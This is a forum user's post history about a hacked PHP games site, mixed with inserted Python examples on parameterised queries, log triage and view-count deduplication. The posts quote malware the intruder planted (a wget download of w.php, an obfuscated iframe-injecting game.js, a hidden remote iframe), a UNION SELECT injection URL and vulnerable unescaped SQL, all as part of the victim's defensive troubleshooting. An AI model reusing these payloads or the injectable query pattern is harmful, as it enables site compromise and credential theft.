hedgehog90

Everything posted by hedgehog90

  1. Hi, I have a games site called GPStudios.com. I paid to have it built in 2009, but as you can see, it's looking a bit ropey these days compared to most other sites. Since having it built, I have made many alterations to the site, and gradually learnt a lot of HTML and PHP along the way. I make games myself, I do all the coding and all the graphics, so I feel quite confident that I can design all the assets of my site with relative ease. I've been using Dreamweaver for years now and I can now quite easily design a page of my own using PHP, HTTP, JavaScript and MySQL. My only weakness is getting to grips with CSS, but I'm working on it.
     I want to redesign the site from the bottom up, ditch the old design and create something completely new. I will obviously use certain elements of the old site (much like I reuse functions/engines/frameworks in all my games), but the site design is SUCH a mess that I don't think it would be wise to tidy it up. It's too far gone IMO.
     So, this is my rather broad question... I would like to know where I should start. What methods should I use? My site is currently made up of mostly .php files. Is this appropriate nowadays? I have attached a few files to show you generally how the site is written. Because every page is largely the same, it uses a lot of includes. Even on a page with unique content, it is often included as a separate PHP file (e.g. homepage_popular). Unfortunately, this makes it difficult to preview the site in the Dreamweaver design view. Also, all the functions for the site are contained within a single functions.class.php file, which I was once told was very bad practice. Is it? I'd like to know generally a method or a practice I should use. When every page more or less uses the same template, is repeating the same div tags and includes necessary? Is there a better way of repeating myself? For instance, if I wanted for some reason to not have a header on my site, this would require me to change every single page.
     My current site has been a victim of PHP injection also, so I'd like to know exactly how I can prevent this happening in the new site. I'm not interested in designing it for multiple screen sizes, because most Flash games aren't really made for mobile devices. I think a 950/1000 px width static container is all I need. I am genuinely focused on redesigning my site, and if it means I have to spend several months of weekends working on it and learning about stuff then so be it. I don't want to pay anyone else to do it, I want it to be 100% my own creation.
     Attachments: index.php, functions.class.php, homepage_popular.php
  2. OK, I've got the message. I'll fuck off now, shall I? Sorry for wasting your time.
  3. Indeed, my hole is truly massive.
  4. I did this... or so I thought. Just to say "CLEAN IT" is not the kind of help I am looking for. Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that. While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this.
  5. FFS, it's back... but now on the forum. I found an edited PHP file in the file /forum/caches/tpl_AeroBlue_search_results.html.php and also in /forum/styles/AeroBlue/template/search_body.html. Both contain this line of code at the top:
     system('wget http://koliasoft.narod2.ru/w.php');
     And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy.) All the files in the cache folder appear to be modified almost daily; this must be normal. However, I can see that search_body.html was edited at 02:38 AM today. I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which I assumed was secure. You would think the latest phpBB would protect itself from MySQL injection??? But apparently not. So, probably from that w.php file, the footer.php had been edited again with that annoying iframe. I need to wait 24 hours until the Apache logs update on my end before I can start seeing exactly how it was done...
     As I said earlier, I updated my phpBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site. I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it. For now, I won't change my username/password, because before I change them I want to have fixed the problem of MySQL injection on the site. Help?
  6. Great, I think I've got it sorted! I went through all the files, searched for every instance of _GET, _POST and _REQUEST, and depending on their data type (int or string) I have applied mysql_real_escape_string to strings, and (int) to ints. I hope this will be enough to stop the same hacker from ever hacking again. The last 2 days have been hell. Cunt.
     How can I encrypt my username and password when used in strings? I think there is only 1 instance of this in my code.
  7. Posted a new topic: http://www.phpfreaks.com/forums/index.php?topic=335030.0
  8. Now, obviously, I can't post the actual code that retrieves my admin login details, but the format of the code used is like this:
     /webpage.php?id=79+and+1=-1+union+/*asd*/+select+1,2,3,password_details,5,6,7,8,9,10,11,12,13,14,15,16+from+databasename/**/.table+limit+0,1--
     On the page that loads the string with a _GET I added this code at the top:
     foreach ($_GET as $key => $value) { $_GET[$key] = mysql_real_escape_string($value); }
     But, when I eventually _GET("id"), it is no different than if I hadn't processed it with mysql_real_escape_string. The page loads just fine and arrogantly displays my login details like a... well... like a massive c*nt. How can I universally stop injections occurring? If I use (int), it's fine, but there are many other queries elsewhere on the site where I need to _GET a string, for which the above injection code will get through despite mysql_real_escape_string. Help, please.
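The pattern in the post above, reproduced as an added example (not code from the site or from anyone in the thread) in Python, with an in-memory SQLite database standing in for MySQL. The schema, the game rows and the admin credentials are made up for the demo. It shows why the escaping did nothing for `id`: the payload contains no quote to escape, and the value is concatenated unquoted into a numeric comparison, so the trailing `union select` is parsed as SQL. A PHP-style `(int)` cast and a bound parameter both close the hole; quote-escaping only ever protects a value that sits inside a quoted string literal.

```python
import re
import sqlite3

# In-memory SQLite stand-in for the site's MySQL database. Schema, rows and
# the admin password are constructed for this demo.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE games (gameid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO games VALUES (1, 'Bunny Invasion 2'), (79, 'Some Game');
        INSERT INTO admin VALUES ('siteadmin', 'hunter2');
    """)
    return db

def escape_string(value):
    # What mysql_real_escape_string does, in SQLite's dialect: it only
    # neutralises characters that could terminate a quoted literal.
    return value.replace("'", "''")

INT_RE = re.compile(r"^\s*[+-]?\d+")

def php_int_cast(value):
    # PHP's (int) cast keeps the leading digits and discards the rest.
    m = INT_RE.match(value)
    return int(m.group()) if m else 0

def lookup_vulnerable(db, game_id):
    # The post's pattern: escape, then concatenate *unquoted* into a numeric
    # comparison. The payload has no quote, so escaping leaves it untouched.
    sql = "SELECT gameid, title FROM games WHERE gameid = " + escape_string(game_id)
    return db.execute(sql).fetchall()

def lookup_int_cast(db, game_id):
    # (int) keeps "79" and throws the rest of the payload away.
    sql = "SELECT gameid, title FROM games WHERE gameid = %d" % php_int_cast(game_id)
    return db.execute(sql).fetchall()

def lookup_parameterised(db, game_id):
    # Bound parameter: the value is never parsed as SQL, whatever it holds.
    # This is the fix that works in every context, numeric or string.
    return db.execute("SELECT gameid, title FROM games WHERE gameid = ?", (game_id,)).fetchall()

def search_title_escaped(db, title):
    # String context: here quote-escaping *does* hold, because the attacker
    # has to break out of the literal before any SQL is reached.
    sql = "SELECT gameid, title FROM games WHERE title = '" + escape_string(title) + "'"
    return db.execute(sql).fetchall()

def demo():
    db = make_db()
    numeric_payload = "79 and 1=-1 union select username, password from admin limit 0,1"
    string_payload = "x' or 1=1 --"
    return {
        "escaping_changed_numeric_payload": escape_string(numeric_payload) != numeric_payload,
        "vulnerable": lookup_vulnerable(db, numeric_payload),
        "int_cast": lookup_int_cast(db, numeric_payload),
        "parameterised": lookup_parameterised(db, numeric_payload),
        "escaped_string_context": search_title_escaped(db, string_payload),
        "legit_title": search_title_escaped(db, "Some Game"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print("%-34s %r" % (key, value))
```

`mysql_real_escape_string` (and its `mysqli` successor) only defends a value that is wrapped in quotes in the final query; `id` here never is. Casting is the right tool for integers; for everything else, prepared statements (`mysqli` or PDO with bound parameters) are what the `?` placeholder above stands for.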
  9. Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts. I've downloaded the scripts from the site and I want to edit them so that this never happens again. I've been trying mysql_real_escape_string with the URL he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example.
  10. I've worked part of it out now... I've been going through the logs for HOURS, it's incredibly tedious and boring. I've found the prick who did this: 89.232.248.163. Russian. Crafty. On May 15th, he used MySQL injection to get my CMS login details. Once he had the login details he played around in the CMS and replaced a game file with w.php. It turns out you can upload PHPs despite what I said... After that, he went to the playgame page for that specific game, and ran it over and over. I've got to admit, this guy was very quick and clever to do this; the back end is a bit of a mess and very hard for someone else to understand (or so I thought).
     So, that explains w.php, but it doesn't necessarily explain game.js and the footer.php and index.php files being edited on May 31st. There is certainly absolutely no functionality in the CMS to alter PHP files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php are in the root. If w.php, when run, edited these files, then why didn't it do it 16 days prior? I can't find anything out through the log about these alterations except the time and day that game.js was first run. What now? More importantly, what are the steps to take to make sure this never happens again?
  11. Ok, I've found something. I was going through the logs, and I found the first occurrence of the game.js file being loaded. I looked back a few seconds before this and found a "POST" that said:
     188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"
     I looked inside /games/files/w/ and sure enough, there it was. I've attached it to show it to you. I have no idea how this was uploaded. It means it was likely done on the back-end and not through FTP, but the script for uploading new games does not allow the upload of PHP files, and it's not recorded by MySQL :/
     I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessible because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my htaccess had disappeared! I didn't even relate it to the apparent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think any more about it. It must have been deleted by the person who uploaded it, and then the script was run.... I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files. Help, please. [attachment deleted by admin]
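An added example, not code from the thread or the site: a small triage script over Apache combined-format access log lines that picks out the two things the posts above eventually found by hand, a script being requested from the game-upload tree (the w.php POST) and a `union select` payload in a query string (the id injection). The first sample line is the POST quoted above; the other lines, the documentation-range client addresses and the `/games/files/` upload prefix are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in Apache combined format. Line 1 is the POST quoted in
# the post above; the rest are made up (RFC 5737 documentation addresses) to
# exercise each rule, including two benign requests that must not fire.
SAMPLE_LOG = """\
188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"
198.51.100.23 - - [15/May/2011:22:10:03 -0500] "GET /webpage.php?id=79+and+1=-1+union+/*asd*/+select+1,2,3,4+from+db/**/.table+limit+0,1-- HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
192.0.2.7 - - [31/May/2011:09:50:01 -0500] "GET /games/files/bunny/bunny-invasion-2.swf HTTP/1.1" 200 81234 "http://www.gpstudios.com/playgame.php?gameid=29" "Mozilla/5.0"
192.0.2.7 - - [31/May/2011:09:50:02 -0500] "GET /playgame.php?gameid=29 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that should only ever serve static uploads (assumed site layout).
UPLOAD_PREFIXES = ("/games/files/",)
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)

# Crude but effective on *decoded* query strings; tune to your own traffic.
SQLI_RE = re.compile(
    r"\bunion\b[\s\S]*?\bselect\b"
    r"|\bselect\b[\s\S]*?\bfrom\b"
    r"|\b(?:or|and)\b\s+\d+\s*=\s*-?\d+",
    re.I,
)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def findings_for(req):
    """Return the reasons a parsed request deserves a closer look."""
    path, _, query = req["target"].partition("?")
    reasons = []
    if path.lower().startswith(UPLOAD_PREFIXES) and SCRIPT_EXT_RE.search(path):
        reasons.append("script executed from upload directory (%s)" % req["method"])
    # The payload in the thread was sent with '+' for spaces, so decode first.
    if SQLI_RE.search(unquote_plus(query)):
        reasons.append("SQL injection pattern in query string")
    return reasons

def triage(log_text):
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req = parse_line(line)
        if req is None:
            hits.append({"ip": "?", "time": "?", "target": line, "reasons": ["unparseable line"]})
            continue
        reasons = findings_for(req)
        if reasons:
            hits.append({"ip": req["ip"], "time": req["time"], "target": req["target"], "reasons": reasons})
    return hits

if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["time"], h["ip"], h["target"][:60], "->", "; ".join(h["reasons"]))
```

The first rule is also the durable fix: a game-upload tree never needs to execute scripts, so configure the web server to refuse them there (for Apache, a per-directory rule that denies access to `.php`-style extensions, or switching the PHP handler off for that directory). Once that is in place a dropped w.php is an inert file rather than a shell, whatever upload path the attacker used.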
  12. I updated it this morning because I read that it might have been the problem. It's up to date, I'm on 3.0.8.
  13. What search term should I search for in MySQL? Download the site and reupload it? I'm sorry, but I really don't see the sense in that; also, due to the amount of data on the website, it would take my internet connection tens of hours to do this. This would be a last resort, it would be such a massive job. Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.
  14. I changed the password and username for my CMS earlier today, but as I just said (in my edited post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but SWFs, text and pictures.
  15. Oh, silly me, I haven't mentioned yet the URL of my website: www.gpstudios.com. If by CMS you mean a back-end, then yes; however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP. I have changed the password to the server account. I use Windows 7.... is that secure enough? I'm quite confident that my computer doesn't have any viruses or trojans. Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission? I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?
  16. I've emailed hostgator once again with further information, and a link to this thread. I've decided not to take the site down temporarily, that seems like quite a massive thing to do for such a small problem. Well, unless it's not as small as I think?
  17. Okay, well it's certainly been rooted. Just found this in footer.php since deleting the last one:
     <iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>
     Please, tell me how I can get rid of this for good. BTW, I've tried SSH & SFTP in FileZilla, but it can never connect. Also, I'm with Hostgator.
  18. My website this morning was displaying 2 iframes that I know I never put in the code.
     In index.php:
     <script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>
     and in my public_html there was a file called game.js that contained the following:
     O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"'));
     I am the only person with the login details to my website/cPanel, and I know I never uploaded/modified these files. I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as I noticed them). They don't seem too bothered about a security risk :/ Anyway, I've changed my login details and all that.
     I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php). In footer.php:
     <iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>
     How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe. This is pretty weird, I changed my login details for cPanel/FTP and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made! I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine.
     Oh, and also, the PHP files index and footer now have twice the number of returns as they originally did. E.g.:
     <h1><?php include("ads/index_160x600_1.php"); ?></h1>
     <h2><?php include("ads/index_125x125_1.php"); ?></h2>
     <h3><?php include("ads/index_125x125_2.php"); ?></h3>
     Became:
     <h1><?php include("ads/index_160x600_1.php"); ?></h1>

     <h2><?php include("ads/index_125x125_1.php"); ?></h2>

     <h3><?php include("ads/index_125x125_2.php"); ?></h3>
     The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen? Are any of these weird files/modifications familiar to anyone else? We had a problem with the site a month ago when Google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and that doesn't feature on our site at all. It was all quite bizarre and the Google thing went away within a day of contacting them. I have a feeling the same person/thing was behind this also. HELP!
  19. Blimey. I got the following report after a single page load:
     2011-01-23 08:03:01|0.06320700 1295791381
     [DOCUMENT_ROOT]=/home/hedgehog/public_html
     [GATEWAY_INTERFACE]=CGI/1.1
     [HTTP_ACCEPT]=image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
     [HTTP_ACCEPT_ENCODING]=gzip, deflate
     [HTTP_ACCEPT_LANGUAGE]=en-GB
     [HTTP_CONNECTION]=Keep-Alive
     [HTTP_COOKIE]=__utma=26257003.834224986.1287699486.1295094119.1295468194.34; __utmz=26257003.1291634664.12.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gp%20studios; __qca=P0-113904449-1287699485875; phpbb3_n6bcx_u=1; phpbb3_n6bcx_k=; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4
     [HTTP_HOST]=www.gpstudios.com
     [HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0C; InfoPath.3)
     [PATH]=/bin:/usr/bin
     [PHPRC]=/home/hedgehog
     [QUERY_STRING]=
     [REDIRECT_STATUS]=200
     [REMOTE_ADDR]=87.114.127.242
     [REMOTE_PORT]=51322
     [REQUEST_METHOD]=GET
     [REQUEST_URI]=/playgame3.php
     [SCRIPT_FILENAME]=/home/hedgehog/public_html/playgame3.php
     [SCRIPT_NAME]=/playgame3.php
     [SERVER_ADDR]=174.120.83.250
     [SERVER_ADMIN]=webmaster@gpstudios.com
     [SERVER_NAME]=www.gpstudios.com
     [SERVER_PORT]=80
     [SERVER_PROTOCOL]=HTTP/1.1
     [SERVER_SIGNATURE]=<address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.gpstudios.com Port 80</address>
     [SERVER_SOFTWARE]=Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
     [UNIQUE_ID]=TTw1FK54U@IAAFiuBboAAAEG
     [PHP_SELF]=/playgame3.php
     [REQUEST_TIME]=1295791381
     [argv]=Array
     [argc]=0

     2011-01-23 08:03:07|0.30064900 1295791387
     [DOCUMENT_ROOT]=/home/hedgehog/public_html
     [GATEWAY_INTERFACE]=CGI/1.1
     [HTTP_ACCEPT]=*/*
     [HTTP_ACCEPT_ENCODING]=gzip, deflate
     [HTTP_ACCEPT_LANGUAGE]=en-GB
     [HTTP_CONNECTION]=Keep-Alive
     [HTTP_COOKIE]=__utma=26257003.834224986.1287699486.1295094119.1295468194.34; __utmz=26257003.1291634664.12.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gp%20studios; __qca=P0-113904449-1287699485875; phpbb3_n6bcx_u=1; phpbb3_n6bcx_k=; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4
     [HTTP_HOST]=www.gpstudios.com
     [HTTP_REFERER]=http://x.mochiads.com/srv/1/49876907fdb169d1.swf
     [HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0C; InfoPath.3)
     [HTTP_X_FLASH_VERSION]=10,1,102,64
     [PATH]=/bin:/usr/bin
     [PHPRC]=/home/hedgehog
     [QUERY_STRING]=
     [REDIRECT_STATUS]=200
     [REMOTE_ADDR]=87.114.127.242
     [REMOTE_PORT]=51322
     [REQUEST_METHOD]=GET
     [REQUEST_URI]=/playgame3.php
     [SCRIPT_FILENAME]=/home/hedgehog/public_html/playgame3.php
     [SCRIPT_NAME]=/playgame3.php
     [SERVER_ADDR]=174.120.83.250
     [SERVER_ADMIN]=webmaster@gpstudios.com
     [SERVER_NAME]=www.gpstudios.com
     [SERVER_PORT]=80
     [SERVER_PROTOCOL]=HTTP/1.1
     [SERVER_SIGNATURE]=<address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.gpstudios.com Port 80</address>
     [SERVER_SOFTWARE]=Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
     [UNIQUE_ID]=TTw1G654U@IAAFiuBeAAAAEG
     [PHP_SELF]=/playgame3.php
     [REQUEST_TIME]=1295791387
     [argv]=Array
     [argc]=0
     Check it out here: http://www.gpstudios.com/log_file.txt Can you make sense of this? Thanks for your help.
  20. And how would you recommend I do this? Surely people must have run into this problem countless times before? Thanks for the help so far, sorry for the delay in replying.
  21. Yes. Like I said, Flash is the root of the problem.
  22. I have made significant progress: I have made a file called playgame3.php, check it out: http://www.gpstudios.com/playgame3.php Here's the code within the file:
     <?php
     require_once("inc/config.inc.php");
     $dbConnectID = mysql_connect(DBHOSTNAME, DBUSERNAME, DBPASSWORD);
     if($dbConnectID){
         mysql_select_db(DBNAME, $dbConnectID);
     }
     //
     function get_view_count(){
         $sql_query = "SELECT * FROM arse where gameid = 1";
         $result = mysql_query($sql_query);
         if(mysql_num_rows($result)) {
             while($row = mysql_fetch_array($result)) {
                 $viewcount = $row['timesplayed'];
             }
         }
         echo "timesplayed = ".$viewcount."</br>";
     }
     get_view_count();
     //
     $gameid = 29;
     if(!empty($gameid)){
         // note: the row updated is hard-coded to gameid = 1, independent of $gameid
         $updatesql = "update arse set timesplayed = timesplayed+1, last_played = now() where gameid = 1";
         mysql_query($updatesql);
     }
     //
     $final_width = 800;
     $final_height = 400;
     $newgamefilepath = "games/files/bunny-invasion-2.swf";
     //
     $playcontent = "<script type=\"text/javascript\">
     document.write('<OBJECT classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0\" WIDTH=\"$final_width\" HEIGHT=\"$final_height\" align=\"middle\" id=\"FlashContent\">');
     document.write('<PARAM NAME=\"movie\" VALUE=\"$newgamefilepath\">');
     document.write('<PARAM NAME=\"quality\" VALUE=\"high\">');
     document.write('<PARAM NAME=\"AllowScriptAccess\" VALUE=\"never\">');
     document.write('<embed width=\"$final_width\" height=\"$final_height\" align=\"middle\" src=\"$newgamefilepath\" quality=\"high\" NAME=\"FlashContent\" AllowScriptAccess=\"never\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/go/getflashplayer\"></embed>');
     document.write('</OBJECT>');
     </script>
     <noscript>
     <OBJECT classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0\" WIDTH=\"$final_width\" HEIGHT=\"$final_height\" align=\"middle\" id=\"FlashContent\">
     <PARAM NAME=\"movie\" VALUE=\"$newgamefilepath\">
     <PARAM NAME=\"quality\" VALUE=\"high\">
     <PARAM NAME=\"AllowScriptAccess\" VALUE=\"never\">
     <embed width=\"$final_width\" height=\"$final_height\" align=\"middle\" src=\"$newgamefilepath\" quality=\"high\" NAME=\"FlashContent\" AllowScriptAccess=\"never\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/go/getflashplayer\"></embed>
     </OBJECT>
     </noscript>";
     echo $playcontent;
     ?>
     Okay, so there it is: all the code is being executed within a single page (apart from inc/config.inc.php, but that's just my database login details). Run the page, the timesplayed = 150. Reload the page, the timesplayed = 152. The problem lies within the Flash content... Okay, I've done all the hard work, now how do I fix this!?
  23. <?php
     session_start();
     require_once("inc/config.inc.php");
     require_once("class/functions.class.php");
     require('drawrating.php');
     $objGlobal = new globalclass();
     require_once("class/site_register.php");
     $gameid = $_GET['gameid'];   // taken straight from the query string, unvalidated
     if(!empty($gameid)){
         $updatesql = "update FUCK set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid";
         mysql_query($updatesql);
     }
     $reviewlistings = $objGlobal->getgamereviews($gameid);
     $displaytitlesql = "SELECT * FROM games WHERE gameid = $gameid";
     $displaytitle=$objGlobal->get_games($displaytitlesql);
     ...
     This is all that's relevant, because there is no other function or query referencing this new table, "FUCK". This is at the top of a file called playgame.php. It is not included in any other PHP files, just here.
     ...
     I have just tried something new: I have uploaded a file called playgame2.php; like the table "FUCK" this is brand new, not referenced anywhere else. And it still happens. I have noticed though, just a couple of minutes ago, that when I load a game for the first time, it'll add 4. Then, when I reload the page, it'll add 2.
  24. I have a games website called GPStudios.com. In a previous topic (that remains unresolved) I needed help fixing a view counter on a specific page that was sometimes executing a MySQL query twice. I've since noticed that it is happening on other pages, maybe all of them. At the top of the PHP file "playgame.php" is the statement:
     $updatesql = "update games set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid"; mysql_query($updatesql);
     However, when I reload the page or check on phpMyAdmin, it has sometimes incremented by 2 (possibly 3). I have confirmed that nowhere else is calling the same query. I created a new table called "FUCK" and edited the code stated above to:
     $updatesql = "update FUCK set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid"; mysql_query($updatesql);
     Upon loading the page, it did exactly the same thing. So I confirmed that the PHP must be being run twice. I have tried it on other pages on my website such as I had no luck on my other topic of the same problem, but hopefully someone might be able to tell me why or how this might be happening. Just remember: it is an absolute certainty that the query is NOT being run elsewhere. Thanks.
  25. Why's no one replying? I really need to sort out this problem, I'll never give up. It's weird as hell... Please help.
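One way to make the counter robust to the second request the log in post 19 shows (same client, same session cookie, six seconds later, carrying an X-Flash-Version header and the ad SWF as its referer), added here as an example rather than code from the site: parse the `[KEY]=value` dumps, treat a request with those Flash markers as the plugin re-fetching the page, and count at most one play per (game, session). The two dumps are trimmed copies of the records quoted above; the `plays` table, the session-keyed rule and the Flash-marker heuristic are assumptions for the demo, not the site's schema or a confirmed diagnosis.

```python
import re
import sqlite3

# Two "[KEY]=value" dumps in the shape of the post's log_file.txt, trimmed to
# the fields that matter and constructed from the two records quoted above.
REQUEST_DUMPS = [
    "[HTTP_HOST]=www.gpstudios.com"
    "[HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
    "[HTTP_COOKIE]=phpbb3_n6bcx_u=1; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4"
    "[REMOTE_ADDR]=87.114.127.242[REQUEST_URI]=/playgame3.php[REQUEST_TIME]=1295791381",
    "[HTTP_HOST]=www.gpstudios.com"
    "[HTTP_REFERER]=http://x.mochiads.com/srv/1/49876907fdb169d1.swf"
    "[HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
    "[HTTP_X_FLASH_VERSION]=10,1,102,64"
    "[HTTP_COOKIE]=phpbb3_n6bcx_u=1; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4"
    "[REMOTE_ADDR]=87.114.127.242[REQUEST_URI]=/playgame3.php[REQUEST_TIME]=1295791387",
]

# Each value runs up to the next "[KEY]=" or the end of the record.
DUMP_RE = re.compile(r"\[([A-Za-z_]+)\]=(.*?)(?=\[[A-Za-z_]+\]=|$)", re.S)

def parse_dump(text):
    """Turn one run-together '[KEY]=value' record into a dict."""
    return {m.group(1): m.group(2) for m in DUMP_RE.finditer(text)}

def is_plugin_reload(req):
    # The second record above carries two markers a normal navigation lacks:
    # an X-Flash-Version header and an .swf as referer. Treat that as the
    # plugin re-fetching the page rather than a person opening the game.
    return ("HTTP_X_FLASH_VERSION" in req
            or req.get("HTTP_REFERER", "").lower().endswith(".swf"))

SID_RE = re.compile(r"phpbb3_\w+_sid=([0-9a-f]+)")

def session_key(req):
    # phpBB session id if the visitor has one, else the client address.
    m = SID_RE.search(req.get("HTTP_COOKIE", ""))
    return m.group(1) if m else req.get("REMOTE_ADDR", "unknown")

def make_db():
    # Assumed schema: the games counter plus a dedupe table keyed per session.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE games (gameid INTEGER PRIMARY KEY, timesplayed INTEGER NOT NULL);
        CREATE TABLE plays (gameid INTEGER, session TEXT, PRIMARY KEY (gameid, session));
        INSERT INTO games VALUES (1, 150);
    """)
    return db

def record_play(db, gameid, req):
    """Count at most one play per (game, session). Returns True if it counted."""
    if is_plugin_reload(req):
        return False
    cur = db.execute("INSERT OR IGNORE INTO plays VALUES (?, ?)", (gameid, session_key(req)))
    if cur.rowcount == 0:          # this session already counted for this game
        return False
    db.execute("UPDATE games SET timesplayed = timesplayed + 1 WHERE gameid = ?", (gameid,))
    return True

def timesplayed(db, gameid):
    return db.execute("SELECT timesplayed FROM games WHERE gameid = ?", (gameid,)).fetchone()[0]

def demo():
    db = make_db()
    counted = [record_play(db, 1, parse_dump(d)) for d in REQUEST_DUMPS]
    return counted, timesplayed(db, 1)

if __name__ == "__main__":
    print(demo())
```

Per-session counting changes the meaning of `timesplayed` from page loads to distinct sessions; if repeat plays should count, store a timestamp in `plays` and dedupe within a window instead. The point that survives either choice is that a GET which writes to the database will be replayed by prefetchers, plugins and crawlers, so the write has to tolerate a repeated request.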